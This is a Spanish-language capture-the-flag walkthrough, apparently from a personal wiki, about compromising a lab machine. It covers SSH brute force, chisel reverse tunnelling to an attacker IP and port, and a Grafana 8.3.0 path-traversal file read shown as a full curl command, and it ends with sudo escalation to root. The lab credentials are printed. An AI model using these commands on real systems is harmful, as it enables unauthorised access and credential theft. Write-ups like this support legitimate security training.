Notas de Luis

Hacemos el escaneo de nmap:

Esto corre por el puerto 80:

Hacemos fuzzing web de archivos, donde intentamos con la extensión .php:

Dentro de este /penguin.php vemos el siguiente contenido, donde se nos saluda como el usuario pinguinito y se nos dice que dentro de esta máquina hay un contenedor de docker de grafana en su versión 8.3.0, así cómo un archivo database_pass.txt en el directorio /tmp del contenedor:

Intentamos acceder por ssh mediante fuerza bruta con el usuario pinguinito, y encontramos la contraseña de love:

Entramos vía SSH:

Ejecutamos el comando hostname -I y vemos una segunda interfaz de red, que nos hace pensar que se trata de docker, tal y como se nos mostró en el puerto 80 de apache:

Para entrar dentro de esta red y sacar los contenedores que haya en su interior, tenemos que usar chisel. Por lo que lo tenemos en la máquina atacante y lo compartimos con la máquina víctima:

Una vez hecho esto, nos ponemos en escucha a modo de servidor con chisel desde la máquina atacante:

./chisel server --reverse -p 1234

Y nos conectamos desde el cliente pasando todo el tráfico a la máquina atacante:

./chisel client 192.168.0.20:1234 R:socks

Ahora desde el navegador tenemos que indicar que el tráfico pase por el túnel:

Así como asegurarnos de haber especificado dicho túnel en el archivo de configuración de Proxychains:

De tal forma que si accedemos al puerto 3000 (que es donde corre grafana por defecto) y ponemos la IP 172.17.0.2 (ya que por defecto docker crea contenedores empezando por la IP .2, luego .3, etc), podremos acceder al grafana del contenedor:

Esta versión de grafana es vulnerable a LFI, por lo que intentamos explotar esto leyendo el archivo database_pass.txt ubicado en el directorio /tmp, tal y como se nos indicó dentro del puerto 80:

proxychains curl 'http://172.17.0.2:3000/public/plugins/text/../../../../../../../../../../../../tmp/database_pass.txt' --path-as-is

Y obtenemos la contraseña de la base de datos:

supermegastrongpasswordpenguin

Nos traemos la base de datos a nuestra máquina atacante:

La abrimos con keepass, por tanto primero vamos a instalar el cliente desde flatpak:

Accedemos a las credenciales del usuario ballenasio:

ballenasio:secureballenasio

Y vemos que funcionan:

Además, este usuario está dentro del grupo sudo, por lo que si volvemos a poner la misma contraseña ya llegamos a root:

computing/hacking/ctf/comunidad_hacking_etico/maquina_liberando_a_willy.txt · Última modificación: por 127.0.0.1